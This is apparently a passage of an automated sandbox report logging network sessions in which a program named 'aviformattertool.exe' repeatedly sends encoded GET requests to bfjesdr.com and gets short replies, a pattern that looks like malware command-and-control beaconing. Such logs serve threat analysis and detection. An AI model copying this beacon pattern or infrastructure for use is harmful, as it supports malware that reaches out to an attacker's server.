                                                                                                                                                        74192.168.2.449812185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:48.938045025 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:49.160002947 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:49 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        75192.168.2.449813185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:49.464920998 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:49.681108952 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:49 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        76192.168.2.449814185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:49.996552944 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:50.222256899 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:50 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        77192.168.2.449815185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:50.530996084 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:50.747817039 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:50 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        78192.168.2.449816185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:51.060671091 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:51.283536911 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:51 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        79192.168.2.449817185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:51.590154886 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:51.807215929 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:51 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        80192.168.2.449818185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:52.130019903 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:52.354525089 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:52 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        81192.168.2.449819185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:52.922993898 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:53.144440889 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:53 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        82192.168.2.449820185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:54.626684904 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:54.847461939 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:54 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        83192.168.2.449821185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:55.154104948 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:55.376924038 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        84192.168.2.449822185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:55.683355093 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:55.899401903 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        85192.168.2.449823185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:56.221788883 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:56.443429947 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:56 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        86192.168.2.449824185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:56.748717070 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:56.964922905 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:56 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        87192.168.2.449825185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:57.279830933 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:57.502969027 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:57 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        88192.168.2.449826185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:57.810183048 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:58.026194096 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:57 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        89192.168.2.449827185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:58.328392029 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:58.550244093 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:58 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        90192.168.2.449828185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:58.857187033 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:59.074208021 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:58 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        91192.168.2.449829185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:59.387161970 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:59.609313011 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:59 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        92192.168.2.449830185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:59.918338060 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:34:00.140093088 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:34:00 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        93192.168.2.449831185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:34:00.448271990 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:34:00.664535999 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:34:00 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        94192.168.2.449832185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:34:00.979515076 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:34:01.200164080 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:34:01 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        95192.168.2.449833185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:34:01.513159037 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
